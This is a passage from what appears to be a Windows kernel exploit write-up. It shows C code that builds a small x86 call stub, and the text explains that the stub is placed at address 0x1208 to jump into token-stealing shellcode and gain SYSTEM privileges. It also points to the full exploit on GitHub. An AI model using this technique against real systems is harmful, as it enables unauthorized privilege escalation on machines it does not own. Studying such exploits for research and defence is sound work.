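    out[0] = 0xb8;                    /* mov eax, imm32 */
    out[1] = (uint8_t)(target);       /* imm32 is stored little-endian */
    out[2] = (uint8_t)(target >> 8);
    out[3] = (uint8_t)(target >> 16);
    out[4] = (uint8_t)(target >> 24);
    out[5] = 0xff;                    /* call eax */
    out[6] = 0xd0;
    out[7] = 0xc9;                    /* leave */
    out[8] = 0xc3;                    /* ret */
    return STUB_SIZE;
}
```

In the exploit the resulting bytes would then be copied to 0x1208, with target set to the address of TokenStealingShellcodeWin7Generic.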

Now recompiling and running the code we get SYSTEM :)

The final/full code for the exploit is on Github.